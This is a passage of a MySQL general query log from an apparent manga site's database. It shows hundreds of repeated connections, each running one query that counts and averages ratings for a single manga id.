mangauser@localhost on u317079482_mangacherri_2 using Socket 330648852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330648852 Quit 330648853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330648853 Quit 330648854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330648854 Quit 330648855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330648855 Quit 330648856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330648856 Quit 330648857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330648857 Quit 330648858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330648858 Quit 330648859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330648859 Quit 330648860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330648860 Quit 330648861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330648861 Quit 330648862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330648862 Quit 330648863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330648863 Quit 330648864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330648864 Quit 330648865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330648865 Quit 330648866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330648866 Quit 330648867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330648867 Quit 330648868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330648868 Quit 330648869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330648869 Quit 330648870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330648870 Quit 330648871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330648871 Quit 330648872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330648872 Quit 330648873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330648873 Quit 330648874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330648874 Quit 330648875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330648875 Quit 330648876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330648876 Quit 330648877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330648877 Quit 330648878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330648878 Quit 330648879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330648879 Quit 330648880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330648880 Quit 330648881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330648881 Quit 330648882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330648882 Quit 330648883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330648883 Quit 330648884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330648884 Quit 330648885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330648885 Quit 330648886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330648886 Quit 330648887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330648887 Quit 330648888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330648888 Quit 330648889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330648889 Quit 330648890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330648890 Quit 330648891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330648891 Quit 330648892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330648892 Quit 330648893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330648893 Quit 330648894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330648894 Quit 330648895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330648895 Quit 330648896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330648896 Quit 330648897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330648897 Quit 330648898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330648898 Quit 330648899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330648899 Quit 330648900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330648900 Quit 330648901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330648901 Quit 330648902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330648902 Quit 330648903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330648903 Quit 330648904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330648904 Quit 330648905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330648905 Quit 330648906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330648906 Quit 330648907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330648907 Quit 330648908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330648908 Quit 330648909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330648909 Quit 330648910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330648910 Quit 330648911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330648911 Quit 330648912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330648912 Quit 330648913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330648913 Quit 330648914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330648914 Quit 330648915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330648915 Quit 330648916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330648916 Quit 330648917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330648917 Quit 330648918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330648918 Quit 330648919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330648919 Quit 330648920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330648920 Quit 330648921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330648921 Quit 330648922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330648922 Quit 330648923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330648923 Quit 330648924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330648924 Quit 330648925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330648925 Quit 330648926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330648926 Quit 330648927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330648927 Quit 330648928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330648928 Quit 330648929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330648929 Quit 330648930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330648930 Quit 330648931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330648931 Quit 330648932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330648932 Quit 330648933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330648933 Quit 330648934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330648934 Quit 330648935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330648935 Quit 330648936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330648936 Quit 330648937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330648937 Quit 330648938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330648938 Quit 330648939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330648939 Quit 330648940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330648940 Quit 330648941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330648941 Quit 330648942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330648942 Quit 330648943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330648943 Quit 330648944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330648944 Quit 330648945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330648945 Quit 330648946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330648946 Quit 330648947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330648947 Quit 330648948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330648948 Quit 330648949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330648949 Quit 330648950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330648950 Quit 330648951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330648951 Quit 330648952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330648952 Quit 330648953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330648953 Quit 330648954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330648954 Quit 330648955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330648955 Quit 330648956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330648956 Quit 330648957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330648957 Quit 330648958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330648958 Quit 330648959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330648959 Quit 330648960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330648960 Quit 330648961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330648961 Quit 330648962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330648962 Quit 330648963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330648963 Quit 330648964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330648964 Quit 330648965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330648965 Quit 330648966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330648966 Quit 330648967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330648967 Quit 330648968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330648968 Quit 330648969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330648969 Quit 330648970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330648970 Quit 330648971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330648971 Quit 330648972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330648972 Quit 330648973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330648973 Quit 330648974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330648974 Quit 330648975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330648975 Quit 330648976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330648976 Quit 330648977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330648977 Quit 330648978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330648978 Quit 330648979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330648979 Quit 330648980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330648980 Quit 330648981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330648981 Quit 330648982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330648982 Quit 330648983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330648983 Quit 330648984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330648984 Quit 330648985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330648985 Quit 330648986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330648986 Quit 330648987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330648987 Quit 330648988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330648988 Quit 330648989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330648989 Quit 330648990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330648990 Quit 330648991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330648991 Quit 330648992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330648992 Quit 330648993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330648993 Quit 330648994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330648994 Quit 330648995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330648995 Quit 330648996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330648996 Quit 330648997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330648997 Quit 330648998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330648998 Quit 330648999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330648999 Quit 330649000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330649000 Quit 330649001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330649001 Quit 330649002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330649002 Quit 330649003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330649003 Quit 330649004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330649004 Quit 330649005 Connect 